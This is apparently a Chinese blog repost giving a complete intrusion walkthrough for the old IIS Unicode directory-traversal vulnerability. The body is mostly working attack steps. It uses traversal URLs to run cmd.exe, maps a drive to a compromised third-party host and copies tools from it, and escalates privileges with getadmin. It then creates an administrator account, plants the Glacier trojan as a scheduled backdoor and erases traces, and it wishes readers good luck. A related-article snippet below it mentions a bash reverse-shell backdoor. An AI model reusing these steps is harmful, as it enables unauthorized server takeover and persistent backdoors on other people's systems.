unicode漏洞利用全攻略

最新推荐文章于 2024-04-08 09:45:00 发布
最新推荐文章于 2024-04-08 09:45:00 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: 漏洞利用 文章标签: 网络 dos 服务器 iis c 工具

by 无用君
  IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在的安全漏洞已经成为了黑客们忠爱的漏洞之一,有希望成为2000年最大的漏洞之一。在此向发现此漏洞的中联绿盟成员袁哥及想出利用映射网络盘方法来解决文件上传问题的l uandao2000致敬。好了,开工吧!

首先是要找到一台带有共享盘的肉鸡,然后将其共享盘映射会本地。找带共享盘的主机不是很难,用国产的黑客软件网络刺客就可以了,在网络刺客中“主机资源”菜单里找“扫描共享主机”,然后填写启始i p和结束ip以后按扫描就,去看会儿电视,再回来看看扫描到没有。没扫描到再换个地址试试,扫描到了的话就可以把他用共享资源菜单中的“影射指定网络盘”把他影射为自己主机的任意一个盘上。
下面的工作就是把工具copy到肉鸡上,假设对方的共享盘为E,ip为127.1.1.2,我们把它影射到了F盘上。现在我们需要copy
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,可以到DOS下输入:
C:/"gt;copy c:/gasys.dll F:/

C:/"gt;copy c:/cmd.exe F:/

C:/"gt;copy c:/getadmin.exe F:/

至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E : http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy e:/winnt/system32/cmd.exe e:/inetpub/scripts/hackercn .exe
这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘: http://127.1.1.1/scripts/hackercn.exe?/c net use Y: //127.1.1.2/E
然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次): http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/gasys.dll d:/inetpub/scripts/gasys.dll http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/cmd.exe d:/inetpub/scripts/cmd.exe http://127.1.1.1/scripts/..?../winnt/system32/cmd.exe?/c copy Y:/getadmin.exe d:/inetpub/scripts/getadmin.exe

好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做: http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS
这样所有的访问者都有了Administrator限权,然后我们再来新建一个用户名为hacker密码为password的用户: http://127.1.1.1/cgi-bin/cmd.exe?/c c:/winnt/system32/net.exe user hacker password /add
然后再把它授予Administrator限权: http://127.1.1.1/scripts/getadmin.exe?hacker

下来就是进入该系统并制作后门了:
在nt的dos下输入
C:/"gt;net use //127.1.1.1/ipc$ "quot;password"quot; /user:"quot;hacker"quot;
现在你已经登陆到了他的主机上,然后上传木马冰河:
C:/"gt;copy C:/unzipped/newglacier/G_Server.exe //127.1.1.1/admin$/system32
然后用net time来获得对方的时间:
C:/"gt;net time //127.1.1.1
假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
C:/"gt;at //127.1.1.1 05:43 G_Server.exe

这样我们就完整的实现了一次入侵,别忘了最后要打扫战场。用冰河删除我们上传过的东西。在“开始”菜单中的“程序”菜单里用“管理工具”中“域用户管理器”的“菜单用户”里选“选择域”,然后输入/ /127.1.1.1,然后还原我们做过手脚的用户。

剩下的事就可以用我们植入的冰河来干了。当然,不见得总会那么走运,在入侵中还会碰到最开始copy文件限权不够等等问题,这就需要大家开动脑筋来解决了。祝各位好运!

aiwtu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用IIS的Unicode漏洞远程执行命令.
02-23
Unicode漏洞专题
01-03
Unicode漏洞详解及使用,让你认识Unicode漏洞,并掌握相关的攻击方法
Unicode漏洞
得峰的专栏 [网络收藏]
05-07 1339
  Unicode漏洞可以说是目前最热门的漏洞了,关于Unicode漏洞原理的文章有很多了,我们初学者没有必要搞清除那些,通过本篇《Unicode漏洞入侵图文讲解》,先来看看具体的使用。 一、准备工具   Rangsc
UNICODE漏洞
得峰的专栏 [网络收藏]
05-07 2134
   ☆发现/scripts/tools/newdsn.exe漏洞newdsn.exe :一个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。1. 创建文件:http://xxx.xxx.xxx.xxx/sc
url中的unicode漏洞
weixin_44897902的博客
12-09 417
上周帮室友考python,才知道自己python学得有多垃圾 神仙打架之—>nginx 预期解:Host/Split: Exploitable Antipatterns in Unicode Normalization(详情请戳这儿) 源码和分析如下: @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url =...
tftpd32.exe用于UNICODE漏洞
10-29
用于计算机网络安全使用unicode漏洞入侵系统使用。
UNICODE字符全表
03-16
UNICODE字符、UNICODE分区、分区地址,包含全部汉字、字符
Unicode汉字编码表(全)
04-20
Unicode汉字编码表是全球计算机系统中用于表示汉字的标准编码之一,它在中文信息处理领域扮演着至关重要的角色。Unicode,全称统一码或万国码,是一个为所有字符集提供唯一数字标识的国际标准,旨在解决不同语言字符...
Unicode的规范化相关漏洞挖掘思路实操1
08-03
Unicode Smuggling(Unicode走私)就是这样一种利用Unicode规范化来绕过安全控制的技术。在2007年的OWASP会议上,这一技术被广泛讨论。攻击者可以利用这种手法,尤其是在动态SQL语句中,通过Unicode字符来构造恶意...
VC++信息安全编程(3)扫描Unicode漏洞
chengyixian7877的博客
03-09 85
Unicode是如今最热门的漏洞之一,也是比较简单易学的一个漏洞,比如去年5.1中美黑客大战中,使用的就是这个漏洞。如果我们能知道他们所采用的入侵手段,就可以进行有效的防御!今天就让我们一起来了解一下那些黑客是怎样利用漏洞进行入侵的,目的是通过对这种黑客手段的了解,来找到防御方法。 什...
木马和IIS Unicode漏洞攻击实验
最新发布
qq_62016430的博客
04-08 862
学到了很多,比如远程的木马攻击是怎么实现的,以及黑客是怎么入侵网页的。在生活中,不要点击不明应用程序,特别是邮件发来的,很有可能是钓鱼邮件。还要注意自己文件的权限,要有限度,不要谁都能改,不然很容易被入侵。最重要的,是培养好网安意识,并开启杀软等工具,能有效避免黑客入侵、木马种植等。在1. 确认 IIS 的版本,并访问 IIS 网页。,一开始找不到,后面发现既可以在开始菜单找到,又可以win+r找到。在2.3 在攻击方利用木马,启动项目没反应,实际上是成功启动了,只不过一闪而过就是说明执行成功。
如何利用unicode漏洞和net dde漏洞夺取系统管理员权限
~缘份天空~
05-29 1124
coolweis 前言 本文的目的不是要教你去黑人家的机器,只是给大家一个思路。请不要做违反法律的事情。 任何利用本方法破坏别人机器等事情本人及本人所在的公司均不负责。 unicode漏洞可谓尽人皆知(偏偏许多系统管理员不知道,呵呵),但是unicode只能拿到guest权限,虽然还有其他办法获得管理员权限,但是比较复杂。 2001年2月5日,atstake.com上面公布了一个windows20
漏洞复现----28、Struts2/S2-005
七天
06-29 513
影响版本 2.0.0 - 2.1.8.1 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞
IIS5 UNICODE 编码漏洞
weixin_34402090的博客
11-15 525
前面一直在讲网络监听,虽然我觉得很有必要,但好多人都发来消息说没什么太多兴趣。虽然还是很想讲这个,但因为大家有意见,就不说。经过快半个月的学习,我想如果你很认真的在看的话的,我想你的基本功已经很好了.今天开始我会开始由一些详细的攻击或其他的方法开始说了,有些地方我就不详细说明了,如果有问题可以发贴来问回到话题,unicode 漏洞是最容易让入侵者...
SQL 取空格右边的字符_SQL注入绕过与防御(Web漏洞及防御)
weixin_39715907的博客
11-16 238
SQL注入绕过大小写绕过根据应用程序的过滤规则,通常会对恶意关键字设置黑名单,如果存在恶意关键字,应用程序就会退出运行。但在过滤规则中可能存在过滤不完整或只过滤小写或大小的情况,没有针对大小写组合进行过滤,导致可以通过大小写混写来绕过关键字过滤!aNd 1=1 ......orDer ByseLeCt......双写关键字绕过id =1 and 1=1加入and被过滤了,最后变成了id =1 1=...
各类后门整理!【白帽黑客必备生存技能】
dfdhxb995397的博客
08-03 634
Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。 nano /etc/xxxx #!/bin/bash if netstat -ano|grep ...
利用unicode漏洞种木马的一点心得
~缘份天空~
05-17 1409
马木 必备装备:代理猎手v3.1可是最新版,unicode漏洞扫描器,ncx99木马,tftpd32一个ftp服务器软件,(下载地址:http://www.cners.com/tools/unicode.zip),bionet木马(这个不用我告诉你哪里下了吧)。  好了,可以开始工作了。。。。。 1、用代理猎手扫80端口,我为什么不用supperscan呢?后面自由分晓。扫到后保存一下列表,
UNICODE漏洞原理及攻击说明
热门推荐
Steven Lei的博客
07-24 1万+
 漏洞描述:    微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"/"而能利用"../"目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知的文件。该账号在默认情况下属于Everyone和Users组的成员,因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除,修改或执行,就如同一个用户成功登陆所能完成

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值